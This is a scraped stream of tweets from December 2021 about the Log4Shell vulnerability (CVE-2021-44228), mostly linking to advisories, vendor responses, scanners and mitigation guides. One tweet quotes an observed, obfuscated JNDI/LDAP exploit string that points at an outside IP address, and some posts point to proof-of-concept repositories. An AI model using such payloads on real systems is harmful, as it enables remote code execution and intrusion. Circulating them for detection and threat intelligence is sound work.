2021-12-16 04:46:32【続報】Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)について(SOS #JobScheduler)を更新しましたので、ご確認ください https://t.co/JNxErTLEup https://www.ossl.co.jp/2021/12/14/%e3%80%90%e7%b6%9a%e5%a0%b1%e3%80%91apache-log4j%e3%81%ae%e4%bb%bb%e6%84%8f%e3%81%ae%e3%82%b3%e3%83%bc%e3%83%89%e5%ae%9f%e8%a1%8c%e3%81%ae%e8%84%86%e5%bc%b1%e6%80%a7%ef%bc%88cve-2021-44228%ef%bc%89/satoruf
2021-12-16 04:41:47アクロニス・ジャパン株式会社、Apache Log4jの脆弱性(CVE-2021-44228)の影響について https://t.co/2Wvw2oVlYa https://newsrelea.se/BV9zNRNewsrelease_IT
2021-12-16 04:41:05log4jの脆弱性でマインクラフトのサーバに攻撃する動画を見た。なんともお手軽すぎ&amp;危なすぎてヤバすぎるが、サーバを立ててる全国のマイクラキッズは大丈夫なのだろうか。 CVE-2021-44228 - Log4j - MINECR… https://t.co/zGwatSM7WP https://twitter.com/i/web/status/1471338535777349632g4evo
2021-12-16 04:40:53Apache Log4jの脆弱性(CVE-2021-44228)の影響について https://t.co/ixWdo813B0 https://www.dreamnews.jp/press/0000250374/2v9uaBOI8nPeyoz
2021-12-16 04:21:29MSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity group… https://t.co/a4lTp5lZ6b https://twitter.com/i/web/status/1471332764783833090curphey
2021-12-16 04:21:00@2600Hz_ @SwingCod @leanrum Don't worry about 1.x. CVE-2021-44228 requires JNDI interpolation which you don't get until 2.x.revprez
2021-12-16 04:20:11🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/i3ahW9qjPw https://twitter.com/i/web/status/1471334155346661381threatintelctr
2021-12-16 04:10:11CVE-2021-44228 pakyuh!dhamirimiri
2021-12-16 04:01:35从零到一带你深入 log4j2 Jndi RCE CVE-2021-44228漏洞 https://t.co/2DDWPw2gD5 https://t.co/wpkrEAqNSK https://ift.tt/3ywWEur https://ift.tt/3ebRr1Pbuaqbot
2021-12-16 04:01:19【重要】GitLab の log4j RCE脆弱性 (CVE-2021-44228, CVE-2021-45046) に対する対処。 SAST または Dependency Scanを使っている方は対処してください。… https://t.co/zKMET2YvWT https://twitter.com/i/web/status/1471327815635443712jeffi7
2021-12-16 04:01:02Protecting against Log4j with Secure Firewall &amp; Secure IPS สำหรับช่องโหว่ Apache Log4j (CVE-2021-44228) ที่ประกาศ… https://t.co/hO0QYoZ4JB https://twitter.com/i/web/status/1471328198486990848CiscoThai
2021-12-16 04:00:33NSX ALB(Avi)のWAFでCVE-2021-44228緩和策になるルールが各バージョン最新パッチにはいってる。(Avi自体はこの脆弱性の対象外) https://t.co/0NxyIzkYSo AV-132431のMore… https://t.co/NJ5HPSdaFZ https://blogs.vmware.com/load-balancing/2021/12/14/avi-waf-and-cve-2021-44228-apache-log4j-2 https://twitter.com/i/web/status/1471328605657796614gowatana
2021-12-16 04:00:09"Announcement Pandora FMS CVE-2021-44228: The critical Apache Log4j vulnerability" https://t.co/EhDYxeVMy9 Via @PandoraFMS. https://pandorafms.com/blog/cve-2021-44228/ks7000
2021-12-16 03:51:43クラウドソース・セキュリティテストのSynack、CVE-2021-44228(log4j) へのお客様支援を緊急発表 https://t.co/xsw4T2SLtl https://t.co/oBNojqGdaC https://prtimes.jp/main/html/rd/p/000000005.000086685.htmlPRTIMES_TECH
2021-12-16 03:51:25NISC 注意喚起、ApacheLog4j の脆弱性(CVE-2021-44228)を悪用する実証コードも公開 https://t.co/POaCErc3UU https://scan.netsecurity.ne.jp/article/2021/12/16/46827.htmlamagasaki820
2021-12-16 03:50:11Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog https://t.co/G2Eip7sMg0 https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/TheRaitlin
2021-12-16 03:33:29Publickey でも紹介されてアクセス数もかなり伸びている Cloud Armor による Apache Log4j 問題(CVE-2021-44228)への対処に関してのBlog記事に続編となる『続 Cloud Armor… https://t.co/MEr6gHXWDU https://twitter.com/i/web/status/1471317155270565888twtko
2021-12-16 03:33:25クラウドソース・セキュリティテストのSynack、CVE-2021-44228(log4j) へのお客様支援を緊急発表 https://t.co/gZGzjKdpvN @PRTIMES_JPより https://prtimes.jp/main/html/rd/p/000000005.000086685.htmlSynackJ
2021-12-16 03:33:21A vulnerabilidade #log4jshell (CVE-2021-44228) do #log4j renderá meses de ataques hackers... É a nova pandemia: cib… https://t.co/idj3jyD8YR https://twitter.com/i/web/status/1471317505755000837relinking
2021-12-16 03:33:17The Apache Log4j vulnerability (CVE-2021-44228) has taken the Internet by storm in the past few days. Learn how… https://t.co/e98fKfJqH2 https://twitter.com/i/web/status/1471317639649705987LearningatCisco
2021-12-16 03:32:19Citrix silently patched CVE-2021-44228 flow in XenMobile Server. (10.14 RP2 &amp; 10.13 RP5) But Citrix didn't mention… https://t.co/vvkFXsstPm https://twitter.com/i/web/status/1471319702102179843twcsftech
2021-12-16 03:32:16【重要】GitLab の log4j RCE脆弱性 (CVE-2021-44228, CVE-2021-45046) に対する対処。 SAST および/または Dependency Scanを使っている方は対処してください。 Gi… https://t.co/9hqzbpB24k https://twitter.com/i/web/status/1471319931333791752jeffi7
2021-12-16 03:32:05Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog https://t.co/7ShRVqxAnj https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/Gate15_Jen
2021-12-16 03:32:01Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ ... - https://t.co/jUCsv4LA0l https://www.intellilink.co.jp/column/vulner/2021/121500.aspxka0com
2021-12-16 03:31:43警察庁 注意喚起、Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃を観測 - https://t.co/2DCUtbEBOu https://scan.netsecurity.ne.jp/article/2021/12/16/46826.htmlka0com
2021-12-16 03:31:41NISC 注意喚起、ApacheLog4j の脆弱性(CVE-2021-44228)を悪用する実証コードも公開 - https://t.co/WM7HYMBF94 https://scan.netsecurity.ne.jp/article/2021/12/16/46827.htmlka0com
2021-12-16 03:18:18クラウドソース・セキュリティテストのSynack、CVE-2021-44228(log4j) へのお客様支援を緊急発表 https://t.co/pne5R4D7nc https://wmr.tokyo/startup/2021/102293/wmr_startup
2021-12-16 03:11:18"2021年12月13日18時24分にすべてのサービスでの対応を完了しております" 👀 | Apache Log4j の脆弱性 (CVE-2021-44228) への対応 | 株式会社ヌーラボ(Nulab inc.) https://t.co/Q4eoX9oHfi https://nulab.com/ja/blog/nulab/log4shell/osamu_arita
2021-12-16 03:07:31【図解】Log4jの脆弱性 CVE-2021-44228 (Log4shell or LogJam) について | SEの道標 https://t.co/xXvIYjBG4i https://milestone-of-se.nesuke.com/sv-advanced/sv-security/cve-2021-44228-log4shell-logjam/HyoYoshikawa
2021-12-16 03:04:05JavaのLog4jライブラリで発見された脆弱性「Log4Shell(CVE-2021-44228)」はなぜ世界中に大きな影響を与えるのか? - GIGAZINE https://t.co/sJWYKElpZ3 https://gigazine.net/news/20211213-cve-2021-44228-jndi-lookup/HyoYoshikawa
2021-12-16 03:00:24Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/FKBmKPnwYd https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/AlexaChenowith
2021-12-16 03:00:24Industry Reactions to Log4Shell Vulnerability - https://t.co/9xxUXwmGIj (CVE-2021-44228) https://www.securityweek.com/industry-reactions-log4shell-vulnerabilitySecurityWeek
2021-12-16 03:00:02SecurityWeek: Industry Reactions to Log4Shell Vulnerability - https://t.co/NvmuJ0OWGx (CVE-2021-44228) https://www.securityweek.com/industry-reactions-log4shell-vulnerabilityMrsYisWhy
2021-12-16 02:57:31Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/hLuO6GzYCu https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/eugenesergio
2021-12-16 02:50:07Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート(NTTデータ先端技術株式会社) https://t.co/ft8LptVUZ4 https://www.intellilink.co.jp/column/vulner/2021/121500.aspxoha000
2021-12-16 02:48:21We updated our blog on the CVE-2021-44228 Log4j 2 vulnerability with details about ransomware attacks on non-Micros… https://t.co/RzDDhEcc59 https://twitter.com/i/web/status/1471307845794779137MsftSecIntel
2021-12-16 02:43:30ApacheLog4j の脆弱性(CVE-2021-44228)に関する注意喚起(内閣官房内閣サイバーセキュリティセンター ) https://t.co/eVRV6xo6w1 https://www.nisc.go.jp/press/pdf/20211213NISC_press.pdfoha000
2021-12-16 02:38:46NISC 注意喚起、ApacheLog4j の脆弱性(CVE-2021-44228)を悪用する実証コードも公開 https://t.co/SGYDK7o6hN https://t.co/kP8Ho04RSK http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2021-12-16%2011%3A10 https://scan.netsecurity.ne.jp/article/2021/12/16/46827.htmlsec_trend
2021-12-16 02:35:51Lots of folks wrote lots of tools, advisories, and blog posts about log4j CVE-2021-44228 at a time when mitigations… https://t.co/k9hloN7641 https://twitter.com/i/web/status/1471304960386215941jschauma
2021-12-16 02:35:36Apache log4j vulnerability CVE-2021-44228 https://t.co/kFNWRK39Y8 #InfluxDB https://bit.ly/3EUmYAJthenewstack
2021-12-16 02:16:12https://t.co/kuJII99TzJ Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft. https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/eagerbeavertech
2021-12-16 02:03:53log4j-scan v1.0- A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 on hosts.… https://t.co/Gbz2KiSGSQ https://twitter.com/i/web/status/1471296744818462720GeekOnTheLoose
2021-12-16 02:00:27Discovering Log4Shell (CVE-2021-44228) vulnerabilities: https://t.co/ClVJlGiHpk https://t.co/nKayvu9C7Y via @YouTube http://Tenable.sc https://youtu.be/LoW439KHo6Qmgillanders
2021-12-16 01:52:44The list of IBM products that are confirmed not impacted by Log4j 2.x CVE-2021-44228 has been updated. The list wil… https://t.co/ChddSQJyu1 https://twitter.com/i/web/status/1471294120144474113cweemeng
2021-12-16 01:52:27サイバーリーズン、Log4j2(Log4Shell)脆弱性(CVE-2021-44228)をついた攻撃(エクスプロイト)防止のために、ワクチンを提供開始 https://t.co/6QS8Ridwlq https://www.cybereason.co.jp/blog/cyberattack/7301/baborin
2021-12-16 01:51:54.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/IkDZqJtZML https://twitter.com/i/web/status/1471295120473575426Woronka
2021-12-16 01:50:12🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/SeouCUp72U https://twitter.com/i/web/status/1471296405687857153threatintelctr
2021-12-16 01:43:45🚀 Today was amazing. #AWSLambda now helps to automatically mitigate the issues in CVE-2021-44228 and CVE-2021-45046… https://t.co/Qgmqen5Df3 https://twitter.com/i/web/status/1471291850396950533MarkSailes3
2021-12-16 01:43:25CVE-2021-44228にCVE-2021-45046が追加されてお仕事も追加されるなど。めどい_fiveo_uyr_ag_
2021-12-16 01:40:38NISC 注意喚起、ApacheLog4j の脆弱性(CVE-2021-44228)を悪用する実証コードも公開 | ScanNetSecurity https://t.co/TUWHhW808c https://scan.netsecurity.ne.jp/article/2021/12/16/46827.htmlohhara_shiojiri
2021-12-16 01:40:31警察庁 注意喚起、Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃を観測 | ScanNetSecurity https://t.co/dplPK53Uh4 https://scan.netsecurity.ne.jp/article/2021/12/16/46826.htmlohhara_shiojiri
2021-12-16 01:31:57警察庁 注意喚起、Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした ... https://t.co/yoVU9Mgi5E https://t.co/IpP2uQg68b http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2021-12-16%2010%3A20 https://scan.netsecurity.ne.jp/article/2021/12/16/46826.htmlsec_trend
2021-12-16 01:30:54Sentry's response to Log4j vulnerability CVE-2021-44228 https://t.co/wBY7orrsOj &gt; Sentry is not impacted by the lo… https://t.co/AAf9ev6fwp https://blog.sentry.io/2021/12/15/sentrys-response-to-log4j-vulnerability-cve-2021-44228/ https://twitter.com/i/web/status/1471290477077229568laco2net
2021-12-16 01:30:40【2021/12/16 情報更新】【重要】「Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)」が及ぼすPARTsolutionsへの影響について、前回の内容を更新いたしました。https://t.co/DFl3pcpTM2 https://www.cadenas.de/news-reader/items/jp-20211216-Apache-Log4jCADENAS_WEB2CAD
2021-12-16 01:30:30The latest update for #Sysdig includes "Exploiting and Mitigating CVE-2021-44228: #Log4j Remote Code Execution (RCE… https://t.co/eiVjSaKEot https://twitter.com/i/web/status/1471291065428848648opsmatters_uk
2021-12-16 01:20:56An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/7vQQCeEV22 https://twitter.com/i/web/status/1471288014697648128ProductCERT
2021-12-16 01:20:12Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/RUJM3KoSm9 https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/1nf0s3cpt
2021-12-16 01:11:26【#お知らせ】#ApacheLog4j の脆弱性(CVE-2021-44228)について 弊社提供のシステムについて影響がない事を 確認致しました。 詳しくは弊社ホームページに記載しておりますので ご覧ください。… https://t.co/0VdiPWN5e9 https://twitter.com/i/web/status/1471285074582978561KtKSolutions
2021-12-16 01:11:19【#更新情報】#ApacheLog4j の 脆弱性(CVE-2021-44228)について 対応した最新のlog4j 2.16.0 が公開されました。 幅広いサービスに影響しております。 早急に対応致しましょう。… https://t.co/eRonG4ReTZ https://twitter.com/i/web/status/1471285155692445696KtKSolutions
2021-12-16 01:10:26Goのリリースプロセスとブランチ戦略 - YAMAGUCHI::weblogはじめに こんにちは!Google Cloudでオブザーバビリティの担当をしているものです。CVE-2021-44228のおかげでバタバタしていますがみな… https://t.co/Nlgf7yX2jI https://twitter.com/i/web/status/1471285564636901378yobata_tw
2021-12-16 01:01:30警察庁 注意喚起、Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃を観測 https://t.co/4pasEv3WzI https://scan.netsecurity.ne.jp/article/2021/12/16/46826.htmlScanNetSecurity
2021-12-16 01:00:50Update for Apache Log4j2 Issue (CVE-2021-44228) https://t.co/jTHyeoRt89 https://aws.amazon.com/security/security-bulletins/AWS-2021-006/security_inside
2021-12-16 01:00:49Detectar La Explotación De CVE-2021-44228 (Log4j2) Con Elastic Security. Leer acá: https://t.co/cwsRvUY6rE https://t.co/21Iu1kcfeP https://anaconda.pe/es/component/content/article/8-noticias/415-detectar-la-explotacion-de-cve-2021-44228-log4j2-con-elastic-security?Itemid=158anacondaservers
2021-12-16 01:00:46Detectar La Explotación De CVE-2021-44228 (Log4j2) Con Elastic Security, Leer acá: https://t.co/ckw2i1sWd6 https://t.co/arxgnXllZD https://hostingdelperu.com/es/component/content/article/8-noticias/347-detectar-la-explotacion-de-cve-2021-44228-log4j2-con-elastic-security?Itemid=158hostingdelperu
2021-12-16 01:00:23Malicious code on a server is easily ran if it’s vulnerable to #Log4Shell. Learn more about CVE-2021-44228, the v… https://t.co/hKyGCnurAF https://twitter.com/i/web/status/1471283943597305856TrendMicroRSRCH
2021-12-16 00:59:52NISC 注意喚起、ApacheLog4j の脆弱性(CVE-2021-44228)を悪用する実証コードも公開 https://t.co/Tu7xd04cg5 https://scan.netsecurity.ne.jp/article/2021/12/16/46827.htmlScanNetSecurity
2021-12-16 00:58:41#Log4j 2.15.0 was to fix the critical RCE vulnerability, CVE-2021-44228 (#log4shell), in 2.14.1 and above. https://t.co/OOQGnpjbeW (2/6) https://www.cve.org/CVERecord?id=CVE-2021-44228scqrinc
2021-12-16 00:52:46GitHub Trending Archive, 14 Dec 2021, All. Puliczek/CVE-2021-44228-PoC-log4j-bypass-words, WazeHell/sam-the-admin,… https://t.co/GVlWtsnfaZ https://twitter.com/i/web/status/1471276453837021184motakasoft
2021-12-16 00:51:43A vulnerability has been discovered involving Apache Log4j (CVE-2021-44228). Apache Log4j is used by IBM Planning A… https://t.co/HHXwU5Vtrb https://twitter.com/i/web/status/1471276904024059911Revelwood
2021-12-16 00:51:16Log4Shell 업데이트 : log4j 두번째 취약점 발견 https://t.co/ekc2CdSUNj - CVE-2021-44228 에 추가로 CVE-2021-45046 보고 - 44228을 수정한 L… https://t.co/ZYKZNISxyx https://j.mp/3H39R19 https://twitter.com/i/web/status/1471277653932253184GeekNewsBot
2021-12-16 00:50:24Detectar La Explotación De CVE-2021-44228 (Log4j2) Con Elastic Security. Leer acá: https://t.co/Fs3QNrWk1t https://t.co/ufxxVX1r1P https://nocperu.com/es/component/content/article/8-noticias/452-detectar-la-explotacion-de-cve-2021-44228-log4j2-con-elastic-security?Itemid=158nocperu_com
2021-12-16 00:45:19#Log4j 2.15.0 was to fix the critical RCE vulnerability, CVE-2021-44228 (#log4shell), in 2.14.1 and above. https://t.co/OOQGnpjbeW (2/6) https://www.cve.org/CVERecord?id=CVE-2021-44228scqrinc
2021-12-16 00:44:49Log4J(CVE-2021-44228)脆弱性に関するBoxの見解 https://t.co/NwY8SfA8gi https://www.boxsquare.jp/blog/log4j-vulnerabilitytokotantanCS
2021-12-16 00:44:10Compared to the CVSS scores Apache published on recent #Log4j vulnerabilities, that of CVE-2021-44228 (#log4shell)… https://t.co/RucRlP63IR https://twitter.com/i/web/status/1471267645252988928scqrinc
2021-12-16 00:36:51https://t.co/LFQEFZritK - “Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration” https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/sohgoh
2021-12-16 00:36:28log4j CVE-2021-44228-Scanner 1.6.2 released https://t.co/vb9isYXNqL #log4shell #log4j @logpresso https://github.com/logpresso/CVE-2021-44228-Scanner/releases/tag/v1.6.28con
2021-12-16 00:34:06#Log4Shell #log4j CVE-2021-44228 Apache tickets to upgrade from Log4j 1.x Spark https://t.co/9Q6Y4oml24… https://t.co/GpoNMqNK5B https://issues.apache.org/jira/browse/SPARK-37630 https://twitter.com/i/web/status/1471274854955507712TomSellers
2021-12-16 00:34:06CVE-2021-44228 に関しては「危なかった。業務時間内に Twitter の TL を見ていなかったら致命傷を負うところだった」という現場が割とあった、ということで良いのかな。grove_twtr
2021-12-16 00:33:47Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation #cybersecurity #cyberattack… https://t.co/VZCCmFxtY3 https://twitter.com/i/web/status/1471269234546257921j2ksec
2021-12-16 00:33:23Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/qkIh01zHTt https://dy.si/mhNPZswedersen
2021-12-16 00:30:22“New data and insights into Log4Shell attacks (CVE-2021-44228)” https://t.co/w80Ivzdj9A https://htn.to/2aHusQLXFQ__gfx__
2021-12-16 00:29:16I have a feeling we’ll be seeing more activity from this threat actor given CVE-2021-44228 https://t.co/ADPrxgsVrr https://twitter.com/gossithedog/status/1436017519949647872ben_bolon
2021-12-16 00:28:30Apache Log4j cyber vulnerability: We are aware of a remote code execution vulnerability (CVE-2021-44228) that is af… https://t.co/REPCvG5VPP https://twitter.com/i/web/status/1471269604290924546JohnCosstick
2021-12-16 00:28:08📦 CVE-2021-44228-Scanner ⭐ 245 (+62) 🗒 Java Vulnerability scanner and mitigation patch for Log4j2 CV... https://t.co/hQhUoKGob1 https://github.com/logpresso/CVE-2021-44228-Scannergh_trending_
2021-12-16 00:26:40@GossiTheDog Will we see them take advantage of CVE-2021-44228???ben_bolon
2021-12-16 00:21:57#NewPOST - CVE-2021-44228: Critical zero-day Log4j vulnerability (Log4Shell) discovered and MuleSoft’s solution Ch… https://t.co/iMCCnvXzjf https://twitter.com/i/web/status/1471273555555930114ProstDev
2021-12-16 00:20:42🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in conf… https://t.co/sHH5iHf9wA https://twitter.com/i/web/status/1471273756781731840threatintelctr
2021-12-16 00:20:424 questions sur Log4shell, la faille qui fait trembler le monde  Une faille de très grande ampleur CVE-2021-44228 v… https://t.co/tzXY0o2T5h https://twitter.com/i/web/status/1471266341093056513argevise
2021-12-16 00:12:55Firewalls (including WAF’s) are not 100 percent effective at mitigating CVE-2021-44228, therefore no one should use… https://t.co/GUDTf1baUu https://twitter.com/i/web/status/1471266558219595782RayRedacted
2021-12-16 00:10:40Log4J(CVE-2021-44228)脆弱性に関するBoxの見解を、WEBに掲載させて頂いております。 https://t.co/bhHp7qQEXm https://www.boxsquare.jp/blog/log4j-vulnerabilityBoxOsaka
2021-12-16 00:10:20OCI WAF で、CVE-2021-44228向けマネージドルールが提供されています https://t.co/CvqX2QauA9ora_club
2021-12-16 00:07:06It is easy for attackers to exploit CVE-2021-44228 (#log4shell) as it doesn't have hard requirements. On the contra… https://t.co/U0pkGtVAxd https://twitter.com/i/web/status/1471267702308159489scqrinc
2021-12-16 00:05:06L’immense faille Log4Shell rappelle que le financement du logiciel libre est essentiel @Numerama https://t.co/8WSJwxV5JG CVE-2021-44228 https://www.numerama.com/tech/789245-limmense-faille-log4shell-rappelle-que-le-financement-du-logiciel-libre-est-essentiel.htmlargevise
2021-12-15 23:58:45Our latest blog digs into how CVE-2021-44228 (#Log4Shell) permits a Remote Code Execution (RCE) allowing the attack… https://t.co/ZPSGqCTodR https://twitter.com/i/web/status/1471261309606014987bcarlton
2021-12-15 23:55:03Thanks CISA for a list of software affected by CVE-2021-44228 https://t.co/e2IwyOtG2m #log4j https://github.com/cisagov/log4j-affected-dbForesightCyber
2021-12-15 23:53:39The latest update for #Rollbar includes "Rollbar #Log4J CVE-2021-44228 ('Log4Shell') Community Update" and "How to… https://t.co/Svlcv9BwGp https://twitter.com/i/web/status/1471262280646074371opsmatters_uk
2021-12-15 23:49:13CVE-2021-44228 Spring Boot Test Service: This is a dirty hack spring boot hello world proejct to test your tooling/… https://t.co/AaeYO5wknQ https://twitter.com/i/web/status/1471262681873190921nigroeneveld
2021-12-15 23:47:25Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Mi... https://t.co/l1orZdVpSU #redteamsec https://www.reddit.com/r/redteamsec/comments/rhccg6/guidance_for_preventing_detecting_and_hunting_for/r_redteamsec
2021-12-15 23:43:05Log4Shell(CVE-2021-44228)related attacks IOCs https://t.co/TzCNi4n6Nm #log4j #log4shell https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCsnigroeneveld
2021-12-15 23:33:32Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog… https://t.co/EnujqsoRMo https://twitter.com/i/web/status/1471260565037215745AcooEdi
2021-12-15 23:32:14Log4j Security Vulnerabilities CVE-2021-44228 - Mitigation Strategies for TAS Operators https://t.co/f6gqe5oSrS… https://t.co/rIib6p4MHK https://bit.ly/3IQr7YZ https://twitter.com/i/web/status/1471260799918391296LagnDary
2021-12-15 23:28:05Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/2zcmNiqYWO https://www.youtube.com/watch?v=0-abhd-CLwQ9a80ea0f8c75431
2021-12-15 23:27:38If you're concerned about the Log4j RCE zero-day exploit (CVE-2021-44228), here's what you need to know - and how C… https://t.co/In4fTszJQh https://twitter.com/i/web/status/1471254321719304192JordanPusey
2021-12-15 23:26:34Mitigate log4shell (CVE-2021-44228 and CVE-2021-45046) vulnerability attacks using Nginx LUA script… https://t.co/RCt9maR9Ta https://twitter.com/i/web/status/1471257441736216580nigroeneveld
2021-12-15 23:26:29CVE-2021-44228: log4j / log4shell Security Research Summary https://t.co/EngcQ1FKjz #log4j #log4shell https://github.com/0xsyr0/log4shellnigroeneveld
2021-12-15 23:21:34Northwave Log4j CVE-2021-44228 checker https://t.co/sHYq60geJP #log4j #log4shell https://github.com/NorthwaveSecurity/log4jchecknigroeneveld
2021-12-15 23:21:20@mlbiam @WeldPond @hacks4pancakes No, 1.x is not vulnerable to CVE-2021-44228. However you should still migrate to 2.16TwutterSupport
2021-12-15 23:18:57@rmuris @WeldPond Where are you seeing that 2.12.2 is NOT vuln to CVE-2021-44228?TwutterSupport
2021-12-15 23:18:19警察庁 注意喚起、Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃を観測 https://t.co/EVadGGqi1w https://t.co/ZvloZO47jW http://dlvr.it/SFS9SyTokyoSec
2021-12-15 23:18:06NISC 注意喚起、ApacheLog4j の脆弱性(CVE-2021-44228)を悪用する実証コードも公開 https://t.co/BDNZlF0g17 https://t.co/O3TSsg5oP1 http://dlvr.it/SFS9TKTokyoSec
2021-12-15 23:12:50Avi WAF and CVE-2021-44228 Apache Log4j 2 https://t.co/arAJI16YFR https://dy.si/RsJy9McKaY0001
2021-12-15 23:04:58CVE-2021-44228 (Log4Shell) Proof of Concept https://t.co/Nnx2vH1l4h #log4j #log4shell https://github.com/sunnyvale-it/CVE-2021-44228-PoCnigroeneveld
2021-12-15 23:04:09Who else is still up right now working on log4j - CVE-2021-44228 https://t.co/D7fP7OnjA8 #devops #opensource #automation https://buff.ly/3dNDSFfosodevops
2021-12-15 23:02:43In the spirit of adding fuel to the fire. Has anyone combined CVE-2021-44228 / #Log4Shell with DNS rebinding? #log4jChop24234166
2021-12-15 23:02:33RCE scanner for Log4j: Using this tool, you can scan for remote command execution vulnerability CVE-2021-44228 on A… https://t.co/tBumJqndlZ https://twitter.com/i/web/status/1471253065177182212nigroeneveld
2021-12-15 23:00:58Example CVE-2021-44228 payload: ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//81.30.157.43:1389/Bas… https://t.co/xf9oLAZ8qZ https://twitter.com/i/web/status/1471253695459332102bad_packets
2021-12-15 22:52:57The recent Log4j vulnerability, CVE-2021-44228, is raising widespread concerns. Juniper Threat Labs assesses the cu… https://t.co/tpxS5wi1qo https://twitter.com/i/web/status/1471249474433470469JuniperNetworks
2021-12-15 22:52:40Zerologon(CVE-2020-1472)のときも、今回のApache Log4j(CVE-2021-44228)でも #TryHackMe にて動作検証。 実際に手を動かすことで如何に刺さりやすい脆弱性であるのか実体験とし… https://t.co/5x4MR1C63i https://twitter.com/i/web/status/1471249621444096001v_avenger
2021-12-15 22:45:59Seriously? Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/iDikaWmnrA via @YouTube https://youtu.be/0-abhd-CLwQechancrure
2021-12-15 22:42:52Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/TyDirys8nj https://www.jpcert.or.jp/at/2021/at210050.htmlkaito834
2021-12-15 22:42:06Apache log4j2 CVE-2021-44228 security vulnerability, updated for WAS remediation of CVE-2021-4104, CVE-2021-45046… https://t.co/JqKcq6Et9n https://twitter.com/i/web/status/1471246966382333952rlesses
2021-12-15 22:40:41NEW BLOG: Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint &amp; Microsoft Sentinel for detecting/alerting… https://t.co/pu91KAQxAI https://twitter.com/i/web/status/1471223988659630090JeffreyAppel7
2021-12-15 22:40:35RHACS Log4Shell mitigation example: A policy-based mitigation example for CVE-2021-44228 on Red Hat Advanced Cluste… https://t.co/XsF4s6oNXb https://twitter.com/i/web/status/1471248107790901249nigroeneveld
2021-12-15 22:33:50Log4Shell Honeypot: Dockerized honeypot for CVE-2021-44228 based on Alpine, written in Python/Flask… https://t.co/5Hszb7nynH https://twitter.com/i/web/status/1471244699226759169nigroeneveld
2021-12-15 22:33:06Suggested Read: log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228 https://t.co/OQhiBQt7yM https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/ChrisShort
2021-12-15 22:32:52Suggested Read: GitHub’s response to Log4j vulnerability CVE-2021-44228 https://t.co/tT93TJH4zP https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/ChrisShort
2021-12-15 22:32:45Suggested Read: Newest Log4j Security Vulnerability - CVE-2021-44228 - Log4Shell https://t.co/yed6wLcBCv https://blog.styra.com/blog/newest-log4j-security-vulnerability-cve-2021-44228-log4shellChrisShort
2021-12-15 22:32:29Suggested Read: Tech Solvency: The Story So Far: CVE-2021-44228 (Log4Shell log4j vulnerability). https://t.co/zUe7tPuGY1 https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/ChrisShort
2021-12-15 22:32:20Suggested Read: Apache projects affected by log4j CVE-2021-44228 : Apache Security Team https://t.co/itNQPKuqCU https://blogs.apache.org/security/entry/cve-2021-44228ChrisShort
